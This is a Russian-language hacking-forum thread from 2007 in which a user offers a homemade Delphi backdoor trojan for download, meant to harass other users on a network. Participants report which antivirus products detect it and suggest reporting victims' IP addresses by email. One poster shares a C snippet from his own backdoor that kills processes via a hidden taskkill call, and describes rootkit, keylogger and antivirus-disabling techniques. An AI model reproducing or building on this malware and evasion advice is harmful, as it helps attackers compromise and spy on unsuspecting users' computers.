Написал свой Backdoor для сети.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Написал свой Backdoor для сети. - 2007-12-08 19:31:18.193333
|
|
|
tp7
Сообщений: 20
Оценки: 0
Присоединился: 2007-11-15 16:22:04.890000
|
Написал простенького трояна на Delphi дабы поиздеваться над юзерами в сетке, вес сервака 181кб, антивирями пока не палится. Кому интересно можете скачать тут.
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-08 19:49:43.486666
|
|
|
BlackDoor
Сообщений: 200
Оценки: 0
Присоединился: 2007-02-16 06:55:09.780000
|
А пасс какой?
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-08 19:51:02.143333
|
|
|
tp7
Сообщений: 20
Оценки: 0
Присоединился: 2007-11-15 16:22:04.890000
|
забыл написать пасс к архиву 123
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-08 19:52:23.116666
|
|
|
BlackDoor
Сообщений: 200
Оценки: 0
Присоединился: 2007-02-16 06:55:09.780000
|
NOD 32 даже распаковать не дал, сразу на файл сматерился.
Перезалей архив (серверная часть не открывается)
Предлагаю дописать сервер так, что бы при выходе в инет отправлял на заданный e-mail текущий IP ламера
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-08 19:59:19.453333
|
|
|
tp7
Сообщений: 20
Оценки: 0
Присоединился: 2007-11-15 16:22:04.890000
|
Она и не должна открываться этож сервак
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-08 20:01:01.223333
|
|
|
BlackDoor
Сообщений: 200
Оценки: 0
Присоединился: 2007-02-16 06:55:09.780000
|
Я пытаюсь извлеч его из архива, а он не извлекается, ИМХО битый
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-08 20:17:52.746666
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
Блин недоделфисты хреновы, это же, на делфи, можно запихать в 17кб … а партнерка от депозита маздай.
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-08 20:27:09.230000
|
|
|
XDXJ9
Сообщений: 78
Оценки: 0
Присоединился: 2007-12-08 17:05:02.406666
|
норм извлёкся , антивирем не спалился ( AVG )
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-08 20:54:59.600000
|
|
|
Useroff
Сообщений: 193
Оценки: 0
Присоединился: 2007-11-09 03:44:58.030000
|
quote:
норм извлёкся , антивирем не спалился ( AVG )
да AVG вообще ничего не палеться….
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-09 00:28:27.393333
|
|
|
XDXJ9
Сообщений: 78
Оценки: 0
Присоединился: 2007-12-08 17:05:02.406666
|
quote:
ORIGINAL: Useroff
quote:
норм извлёкся , антивирем не спалился ( AVG )
да AVG вообще ничего не палеться….
quote:
да AVG вообще ничего не палеться….
да не avg тож много чего ловит =)
а бекдор кстати рабочий , нормальный , я на себе проверил
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-09 09:17:49.080000
|
|
|
stasww
Сообщений: 71
Оценки: 0
Присоединился: 2007-03-02 20:15:34.900000
|
Хм… эвристик каспера щиманул твоё творение :)
Используем кнопку "Редактировать", а не постим 10 подряд.
Читаем правила, удаляю…
//s@1m0nn
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-09 16:22:49.726666
|
|
|
tp7
Сообщений: 20
Оценки: 0
Присоединился: 2007-11-15 16:22:04.890000
|
quote:
Ты в курсе что твой трой не может выгрухать системные процессы ?
Да… но думаю итак сойдет.
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-10 13:12:49.896666
|
|
|
stasww
Сообщений: 71
Оценки: 0
Присоединился: 2007-03-02 20:15:34.900000
|
Щас помогу тебе
——-
Вот вырезки одного из моих доров
————-
char im[129] = "-im ";
char key[129] = " /f";
char comand[256];
switch tm=="Kill_task"
{
strcat(comand,key);
strcat(im,comand);
ShellExecute(NULL, "open", "taskkill.exe" , im, NULL, SW_HIDE);
}
Таким образом ты сможешь отрубить любой процесс используя стандартную виндовую утилиту taskkill.exe
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-10 13:42:58.483333
|
|
|
XDXJ9
Сообщений: 78
Оценки: 0
Присоединился: 2007-12-08 17:05:02.406666
|
вчера вечером на сервер стал ругаться нод …
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-10 13:53:15.286666
|
|
|
Belfigor
Сообщений: 80
Оценки: 0
Присоединился: 2007-05-07 03:37:58.466666
|
quote:
ORIGINAL: tp7
Написал простенького трояна на Delphi дабы поиздеваться над юзерами в сетке, вес сервака 181кб, антивирями пока не палится. Кому интересно можете скачать тут.
ещё один эксперемент был уже тут http://forum.xakep.ru/m_1023453/mpage_1/key_/tm.htm#1024264
зы если ты его сам писал , почему он палиться , по идеи его же ещё нет в АБ , походу ты чужой исходник скомпилил :D
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-10 15:40:55.550000
|
|
|
stasww
Сообщений: 71
Оценки: 0
Присоединился: 2007-03-02 20:15:34.900000
|
quote:
ORIGINAL: Belfigor
quote:
ORIGINAL: tp7
Написал простенького трояна на Delphi дабы поиздеваться над юзерами в сетке, вес сервака 181кб, антивирями пока не палится. Кому интересно можете скачать тут.
ещё один эксперемент был уже тут http://forum.xakep.ru/m_1023453/mpage_1/key_/tm.htm#1024264
зы если ты его сам писал , почему он палиться , по идеи его же ещё нет в АБ , походу ты чужой исходник скомпилил :D
quote:
зы если ты его сам писал , почему он палиться , по идеи его же ещё нет в АБ , походу ты чужой исходник скомпилил
При написании юзался мозг + мсдн, антивирус кричит по тому что скампилино приложение в visual studio 6, многие аверы сделаи сигнатуры на приложения каторые используют GetSystemDirectory() GetFileModuleName и при этом лезут в реестр. Если я не ошибась я кидал криптованую версию, антивирусами не палится, но есть косяки. В данный момент проэкт переписывается с нуля, много времени тратится на написание kernel-mode руткита, а сам дроп каторый обходит ав готов. Добавилось 8 новых функций(основная это мониторинг тёти клавы)
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-10 15:51:43.296666
|
|
|
tp7
Сообщений: 20
Оценки: 0
Присоединился: 2007-11-15 16:22:04.890000
|
quote:
зы если ты его сам писал , почему он палиться , по идеи его же ещё нет в АБ
Я повырезал код с разных источников, гугл мне в этом помог.
Добавил в трой функию запуска экзишников на компе юзера, удаление папки вместе со всем содержимым, показ\удаление сервака.
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-10 17:05:23.223333
|
|
|
nevrotkampot
Сообщений: 114
Оценки: 0
Присоединился: 2007-11-18 14:22:48.083333
|
Сделай ток чтоб нодом не палился а то толку некакого
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-11 02:06:24.630000
|
|
|
Belfigor
Сообщений: 80
Оценки: 0
Присоединился: 2007-05-07 03:37:58.466666
|
quote:
ORIGINAL: tp7
quote:
зы если ты его сам писал , почему он палиться , по идеи его же ещё нет в АБ
Я повырезал код с разных источников, гугл мне в этом помог.
Добавил в трой функию запуска экзишников на компе юзера, удаление папки вместе со всем содержимым, показ\удаление сервака.
за честность тебе +2 :)
ЗЫ люди я вот что думаю и ищу , где можно найти ProRat SE 1.9 , в этой версии походу можно сервак изменять и тд и тп , где найти ? всё перерыл везде PR s 1.8(Fix) одну нашёл можно криптовать но потом к ниму нельзя приконектиться , пишет что изменять можно только SE 19 [:(]
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-13 13:00:34.960000
|
|
|
tp7
Сообщений: 20
Оценки: 0
Присоединился: 2007-11-15 16:22:04.890000
|
Народ помогите может кто знает как можно обойти аутпост.
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-13 23:50:18.416666
|
|
|
stasww
Сообщений: 71
Оценки: 0
Присоединился: 2007-03-02 20:15:34.900000
|
>>Народ помогите может кто знает как можно обойти аутпост
Ну самый примитивный способ это клацать на кнопочки в алерте, ну каспера 7-ого я грохаю путём фильтрации памяти, при определённой методике касперу необходимо будет сбросить груз - в качестве груза выступает пара библиотек и один юзермодный драйвер. Также можешь просто скрыть появившейся алерт каспера, при этом негде нечего не клацай - так как при выключении компа каспер умерает первым, тоесть инсталироваться в систему ты сможеш… ну крутой способ эт использование антиотладочных средств каторые отлично срабатывают против эвристиков и повед.блокираторов- при скане твоего файла антивирус помирает :(
Вобщем полазь в мсдн'е найдёшь чёнить прикольного
|
|
|
|
|
RE: Написал свой Backdoor для сети. - 2007-12-17 02:09:33.956666
|
|
|
_NuClear
Сообщений: 8
Оценки: 0
Присоединился: 2007-12-17 01:48:34.450000
|
Если можно выложи исходники, тогда каждый сможет модифицировать, и палится не будет
|
|
|
|
|
|
